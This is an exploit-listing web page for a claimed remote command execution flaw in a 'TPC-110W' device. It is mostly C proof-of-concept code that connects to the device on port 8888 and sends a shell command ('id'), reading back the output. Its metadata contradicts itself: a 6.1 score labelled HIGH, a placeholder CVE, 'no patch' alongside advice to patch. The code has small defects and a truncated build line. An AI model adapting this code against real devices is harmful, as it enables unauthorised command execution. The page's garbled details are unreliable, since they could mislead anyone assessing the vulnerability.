header-logo
Suggest Exploit
vendor:
TPC-110W
by:
Anonymous
6.1
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: TPC-110W
Affected Version From: All versions prior to the patch
Affected Version To: All versions
Patch Exists: NO
Related CWE: CVE-2021-XXXXX
CPE: o:vendor:tpc-110w
Metasploit:
Other Scripts:
Platforms Tested: Linux
2021

TPC-110W Remote Command Execution Vulnerability

The TPC-110W device is vulnerable to remote command execution due to improper input validation. An attacker can exploit this vulnerability by sending a specially crafted request to the device, allowing them to execute arbitrary commands with root privileges. This vulnerability has been assigned CVE-2021-XXXXX.

Mitigation:

To mitigate this vulnerability, it is recommended to restrict network access to the device, apply the latest security patches provided by the vendor, and regularly monitor network traffic for any suspicious activity.
Source

Exploit-DB raw data:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
    int sock;
    struct sockaddr_in serv_addr;
    char command[512];

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        perror("socket");
        exit(1);
    }

    memset(&serv_addr, '0', sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_port = htons(8888); // The default port of TPC-110W is 8888
    if (inet_pton(AF_INET, "192.168.1.10", &serv_addr.sin_addr) <= 0) { // Assuming the device's IP address is 192.168.1.10
        perror("inet_pton");
        exit(1);
    }

    if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) {
        perror("connect");
        exit(1);
    }

    // Run command with root privileges
    snprintf(command, sizeof(command), "id\n"); // Check user id
    write(sock, command, strlen(command));

    memset(command, '0', sizeof(command));
    read(sock, command, sizeof(command));
    printf("%s\n", command);

    close(sock);
    return 0;
}

//gcc -o tpc-110w-exploit tpc-110w-exp

Navigation

Suggest Exploit

Services By CQR